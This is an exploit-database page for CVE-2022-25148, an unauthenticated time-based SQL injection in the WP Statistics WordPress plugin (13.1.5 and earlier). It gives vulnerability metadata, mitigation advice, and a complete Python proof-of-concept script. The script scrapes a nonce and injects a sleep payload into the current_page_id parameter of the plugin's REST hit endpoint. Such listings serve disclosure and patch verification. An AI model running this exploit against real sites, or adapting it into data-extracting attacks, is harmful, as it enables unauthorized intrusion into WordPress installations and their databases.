WP Statistics Plugin - exploit.company

vendor:

WP Statistics Plugin

by:

psychoSherlock

7.5

CVSS

HIGH

Time based SQL injection

CWE

Product Name: WP Statistics Plugin

Affected Version From: 13.1.2005

Affected Version To: 13.1.2005

Patch Exists: YES

Related CWE: CVE-2022-25148

CPE: a:wp-statistics:wp-statistics:13.1.5

Metasploit:

Other Scripts:

Platforms Tested:

2022

WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)

This exploit targets the WP Statistics Plugin version 13.1.5 and prior. It allows an unauthenticated attacker to perform a time-based SQL injection attack by manipulating the 'current_page_id' parameter in the '/wp-json/wp-statistics/v2/hit' endpoint. The vulnerability can be exploited to cause a delay in the response time of the target server, indicating a successful injection.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to WP Statistics Plugin version 13.1.6 or later to mitigate the risk of exploitation. It is also recommended to restrict access to the affected endpoint to trusted users only.

Source

Exploit-DB raw data:

# Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)
# Date: 13/02/2022
# Exploit Author: psychoSherlock
# Vendor Homepage: https://wp-statistics.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip
# Version: 13.1.5 and prior
# Tested on: wp-statistics 13.1.5
# CVE : CVE-2022-25148
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# CVSS Score: 8.4 (High)

import argparse
import requests
import re
import urllib.parse


def main():
    parser = argparse.ArgumentParser(description="CVE-2022-25148")
    parser.add_argument('-u', '--url', required=True,
                        help='Wordpress base URL')

    args = parser.parse_args()

    baseUrl = args.url
    payload = "IF(1=1, sleep(5), 1)"

    wp_session = requests.session()

    resp = wp_session.get(baseUrl)
    nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text).group(1)
    print(f"Gathered Nonce: {nonce}")

    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}

    payload = urllib.parse.quote_plus(payload)
    exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id={payload}&search_query&page_uri=/&user_id=0'
    exploit_url = baseUrl + exploit

    print(f'\nSending: {exploit_url}')

    resp = wp_session.get(exploit_url, headers=headers)

    if float(resp.elapsed.total_seconds()) >= 5.0:
        print("\n!!! Target is vulnerable !!!")
        print(f'\nTime taken: {resp.elapsed.total_seconds()}')
    else:
        print('Target is not vulnerable')


if __name__ == "__main__":
    main()